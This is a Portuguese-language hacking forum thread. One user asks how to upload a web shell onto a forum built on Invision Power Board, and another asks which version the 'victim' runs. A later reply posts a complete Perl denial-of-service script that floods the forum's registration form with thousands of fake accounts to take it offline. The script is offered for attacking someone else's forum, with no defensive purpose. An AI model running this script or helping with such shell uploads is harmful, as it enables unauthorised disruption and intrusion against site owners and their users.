Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Dúvida] Upar Shell em sistema de Fórum IPB

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    [Dúvida] Upar Shell em sistema de Fórum IPB

    Olá galera, tudo bem? enfim gostaria de saber se existe algum tutorial ou até mesmo um Hook que ensine ou que seja uma shell para ser utilizada especialmente nos sistemas de fóruns Invision Power Board ( IPB ).
    Então, se não entenderem só falar.. espero uma resposta :P
    Desde já agradeço quem for responder e me ajudar.

  • Font Size
    #2
    Eae, grande Myst, tá sumido ne?
    Qual a versão do IPB da vítima?
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

    Comment


    • Font Size
      #3
      Postado Originalmente por 0KaL Ver Post
      Eae, grande Myst, tá sumido ne?
      Qual a versão do IPB da vítima?
      To nada, tu que me abandonou :P
      Versão 3.2x

      Comment


      • Font Size
        #4
        Upar shell eu não consegui. A versão vulnerável mais próxima é a 3.1.4 no SecurityFocus.com, mas achei em um fórum gringo o bot a seguir, que diz que explora uma vulnerabilidade no captcha existente em todas as versões do IPB e cria loops no MySQL, fazendo com que o fórum fique inacessível. É em PERL.
        Código:
        #!/usr/bin/perl 
        use IO::Socket; 
        ########################################################## 
        ##       _______ _______ ______        # 
        ##       |______ |______ |     \       # 
        ##       ______| |______ |_____/       # 
        ##                                     # 
        ##IPB Register Multiple Users Denial of Service          # 
        ##Doesn't Work on forums using "Code Confirmation"    # 
        ##Created By SkOd                                        # 
        ##SED security Team                                      # 
        ##http://www.sed-team.be                                 # 
        ##skod.uk@gmail.com                                      # 
        ##ISRAEL                                                 # 
        ########################################################## 
        
        print q{ 
        ############################################################ 
        #        Invision Power Board Multiple Users DOS      # 
        #      Tested on IPB 2.0.1            # 
        #       created By SkOd. SED Security Team             # 
        ############################################################ 
        }; 
        $rand=rand(10); 
        print "Forum Host: "; 
        $serv = <stdin>; 
        chop ($serv); 
        print "Forum Path: "; 
        $path = <stdin>; 
        chop ($path); 
        for ($i=0; $i<9999; $i++) 
        { 
        $name="sedXPL_".$rand.$i; 
        $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
        $len = length $data; 
        $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed"; 
        print $get1 "POST ".$path."index.php HTTP/1.0\n"; 
        print $get1 "Host: ".$serv."\n"; 
        print $get1 "Content-Type: application/x-www-form-urlencoded\n"; 
        print $get1 "Content-Length: ".$len."\n\n"; 
        print $get1 $data; 
        syswrite STDOUT, "+"; 
        } 
        print "Forum shuld be Dosed. Check it out...\n"; 
        
        # milw0rm.com [2006-02-10]
        Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        PS: Que nick voce usa no MSN? O Pidgin tá todo bugado :/
        Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



        Notify-list · Twitter · Blog

        Nova lei: Invadir computadores protegidos é crime.
        Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)

        Comment

        X
        Working...
        X